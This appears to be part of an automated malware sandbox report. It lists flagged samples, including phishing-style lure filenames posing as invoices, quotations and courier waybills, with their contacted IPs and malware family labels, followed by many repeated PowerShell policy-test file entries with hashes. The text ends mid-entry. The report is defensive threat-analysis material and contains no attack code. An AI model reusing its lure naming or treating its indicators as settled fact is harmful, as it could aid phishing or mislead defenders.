                                                                                                                                                                                            26HY8aPgae.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            26HY8aPgae.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            upb.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            6724f91d7b548.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            #U2749processo#U2749_#U2464#U2461#U2467#U2465#U2462#U2463#U2467#U2461.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            6724c67fe2634.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            #U2749Factura_#U2749_#U2462#U2465#U2460#U2463#U2463#U2460#U2462#U2461.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            #U2749Factura_#U2749_#U2466#U2461#U2466#U2462#U2467#U2465#U2465#U2465.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                            • 34.117.59.81
                                                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0ehttps://de.vour.ioGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            F#U0130YAT TEKL#U0130F #U0130STE#U011e#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            malware-DONT-RUN.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            investment-fund.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            SecuriteInfo.com.Win32.RATX-gen.5672.16639.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            bestgreetingwithbestthingsevermadewithgreatthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            Request for quotation for the pumps.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            po_5621565612.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            5% discount products.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                            • 149.154.167.220
                                                                                                                                                                                            DB_DHL_AWB_001833022AD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                            • 149.154.167.220

                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            C:\Users\user\Desktop\libcurl.dllapp64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              C:\Users\user\Desktop\zlib1.dllapp64.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:@...e...........................................................

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0f1f4vj5.yw0.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0socx4n1.2o0.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1g3jek15.ria.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1oadlcwy.cox.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1svqw2bh.q0n.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1tba41he.tip.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2rgabwjo.rcz.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_35m3115t.tjy.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3is4uvkl.5ix.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41f4es14.wa3.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fvf1xok.c50.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dczpefe.fay.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ak1roums.g4v.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bqwanijp.0kc.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0dxyyui.o4w.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3eardez.4ld.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccq5nxjg.jlv.psm1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d3xdrul2.dpe.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dapyzslf.3yi.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkdcnbwg.q41.ps1

                                                                                                                                                                                                Download File
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e44k3o0c.yvw.ps1

                                                                                                                                                                                                Download File
